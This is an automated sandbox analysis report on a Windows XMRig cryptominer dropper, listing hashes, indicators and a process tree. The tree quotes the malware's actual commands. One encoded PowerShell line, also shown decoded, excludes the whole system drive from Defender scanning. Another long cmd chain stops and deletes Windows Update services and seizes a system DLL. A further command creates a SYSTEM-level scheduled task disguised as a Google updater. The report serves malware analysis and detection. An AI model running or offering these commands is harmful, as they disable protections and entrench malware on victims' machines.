Analysis
- max time kernel: 149s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17-03-2023 07:57
Static task: static1
Behavioral task: behavioral1
Sample: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
Resource: win7-20230220-en
General
- Target: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
- Size: 4.3MB
- MD5: ccaffcd12dcb30adb5250f30026ecd1e
- SHA1: 4048dc71db497f641a4f35eb00ac3c163c394978
- SHA256: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
- SHA512: a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
- SSDEEP: 98304:w1XNI4kmUg+DgxP1Wrj3DIIs0LHhjwSKVjV3:w9NInmUg5xqX/sCHhj7K5p
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes (description, ioc, process):
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
XMRig Miner payload 12 IoCs
Processes (resource, yara_rule):
- behavioral2/memory/672-197-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-200-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-201-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-203-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-204-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-205-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-206-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-207-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-208-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-210-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-219-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/672-220-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
Possible privilege escalation attempt 4 IoCs
Processes (pid, process):
- 1904 icacls.exe
- 2344 takeown.exe
- 3412 icacls.exe
- 5016 takeown.exe
Stops running service(s) 3 TTPs
Executes dropped EXE 1 IoCs
Processes (pid, process):
- 1228 services.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes (pid, process):
- 3412 icacls.exe
- 5016 takeown.exe
- 1904 icacls.exe
- 2344 takeown.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Drops file in System32 directory 3 IoCs
Processes (description, ioc, process):
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
Suspicious use of SetThreadContext 2 IoCs
Processes (description, pid, process, target process):
- PID 2408 (conhost.exe) set thread context of 984 (conhost.exe)
- PID 2408 (conhost.exe) set thread context of 672 (svchost.exe)
Drops file in Program Files directory 3 IoCs
Processes (description, ioc, process):
- File created C:\Program Files\Windows\services.exe (conhost.exe)
- File opened for modification C:\Program Files\Windows\services.exe (conhost.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (conhost.exe)
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
- 4552 sc.exe
- 4996 sc.exe
- 3792 sc.exe
- 648 sc.exe
- 492 sc.exe
- 1104 sc.exe
- 4248 sc.exe
- 2308 sc.exe
- 1576 sc.exe
- 4032 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS 55 IoCs
Processes (description, ioc, process):
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (conhost.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (conhost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (conhost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (conhost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT (svchost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (conhost.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
Modifies registry key 1 TTPs 18 IoCs
Processes (pid, process):
- 4168 reg.exe
- 3740 reg.exe
- 3156 reg.exe
- 3412 reg.exe
- 1856 reg.exe
- 4728 reg.exe
- 2372 reg.exe
- 3972 reg.exe
- 2056 reg.exe
- 3776 reg.exe
- 5052 reg.exe
- 928 reg.exe
- 4304 reg.exe
- 4796 reg.exe
- 3820 reg.exe
- 2356 reg.exe
- 3328 reg.exe
- 660 reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process; repeated entries collapsed with their count):
- 3164 powershell.exe (2 entries)
- 1092 conhost.exe (1 entry)
- 2952 powershell.exe (2 entries)
- 2408 conhost.exe (1 entry)
- 672 svchost.exe (58 entries)
Suspicious behavior: LoadsDriver 1 IoCs
Processes (pid, process):
- 676 (no process name recorded)
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes (description, pid, process):
- Token: SeDebugPrivilege 3164 powershell.exe
- Token: SeDebugPrivilege 1092 conhost.exe
- Token: SeTakeOwnershipPrivilege 5016 takeown.exe
- Token: SeDebugPrivilege 2952 powershell.exe
- Token: SeDebugPrivilege 2408 conhost.exe
- Token: SeTakeOwnershipPrivilege 2344 takeown.exe
- Token: SeLockMemoryPrivilege 672 svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid, process, target process; repeated entries collapsed with their count):
- PID 1328 (fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe) wrote to memory of 1092 (conhost.exe) (3 entries)
- PID 1092 (conhost.exe) wrote to memory of 3980 (cmd.exe) (2 entries)
- PID 3980 (cmd.exe) wrote to memory of 3164 (powershell.exe) (2 entries)
- PID 1092 (conhost.exe) wrote to memory of 700 (cmd.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4552 (sc.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4996 (sc.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 1104 (sc.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 3792 (sc.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4248 (sc.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 2372 (reg.exe) (2 entries)
- PID 1092 (conhost.exe) wrote to memory of 5000 (cmd.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 928 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 3412 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 2356 (reg.exe) (2 entries)
- PID 5000 (cmd.exe) wrote to memory of 2268 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4304 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 5016 (takeown.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 1904 (icacls.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 3328 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4796 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 1856 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4728 (reg.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 3904 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 1128 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 2236 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4948 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 4988 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 1796 (schtasks.exe) (2 entries)
- PID 700 (cmd.exe) wrote to memory of 3720 (schtasks.exe) (2 entries)
- PID 1092 (conhost.exe) wrote to memory of 5020 (cmd.exe) (2 entries)
- PID 5020 (cmd.exe) wrote to memory of 4212 (schtasks.exe) (2 entries)
- PID 1228 (services.exe) wrote to memory of 2408 (conhost.exe) (1 entry)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (process tree; [level N] is the depth in the tree, followed by the image path, the command line, the signatures that fired for the process, and its PID)
- [level 1] C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"
  - Suspicious use of WriteProcessMemory
  PID: 1328
- [level 2] C:\Windows\System32\conhost.exe
  Command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1092
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
  Note: the -EncodedCommand argument is base64 of UTF-16LE text and decodes to: <#enm#> Add-MpPreference <#keh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ve#> -Force <#xg#>. The <#...#> tokens are PowerShell block comments used as filler; the effective command adds Microsoft Defender exclusions for the user profile and the whole system drive, which is why the miner dropped later is not scanned.
  - Suspicious use of WriteProcessMemory
  PID: 3980
- [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3164
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  - Suspicious use of WriteProcessMemory
  PID: 700
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop UsoSvc
  - Launches sc.exe
  PID: 4552
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID: 4996
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop wuauserv
  - Launches sc.exe
  PID: 1104
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop bits
  - Launches sc.exe
  PID: 3792
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop dosvc
  - Launches sc.exe
  PID: 4248
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
  PID: 2372
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
  PID: 928
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies security service
  - Modifies registry key
  PID: 3412
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
  PID: 2356
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
  PID: 4304
- [level 4] C:\Windows\system32\takeown.exe
  Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID: 5016
- [level 4] C:\Windows\system32\icacls.exe
  Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID: 1904
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
  PID: 3328
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
  PID: 4796
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
  PID: 1856
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
  PID: 4728
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
  PID: 3904
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
  PID: 1128
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
  PID: 2236
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
  PID: 4948
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
  PID: 4988
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
  PID: 1796
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  PID: 3720
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
  - Suspicious use of WriteProcessMemory
  PID: 5000
- [level 4] C:\Windows\system32\schtasks.exe
  Command: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
  - Creates scheduled task(s)
  PID: 2268
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
  - Suspicious use of WriteProcessMemory
  PID: 5020
- [level 4] C:\Windows\system32\schtasks.exe
  Command: schtasks /run /tn "GoogleUpdateTaskMachineQC"
  PID: 4212
- [level 1] C:\Program Files\Windows\services.exe
  Command: "C:\Program Files\Windows\services.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID: 1228
- [level 2] C:\Windows\System32\conhost.exe
  Command: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2408
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
  (same encoded Add-MpPreference command as PID 3980 above)
  PID: 1516
- [level 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2952
- [level 3] C:\Windows\System32\cmd.exe
  Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  PID: 3876
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop UsoSvc
  - Launches sc.exe
  PID: 648
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop WaaSMedicSvc
  - Launches sc.exe
  PID: 2308
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop wuauserv
  - Launches sc.exe
  PID: 1576
- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop bits
  - Launches sc.exe
  PID: 492
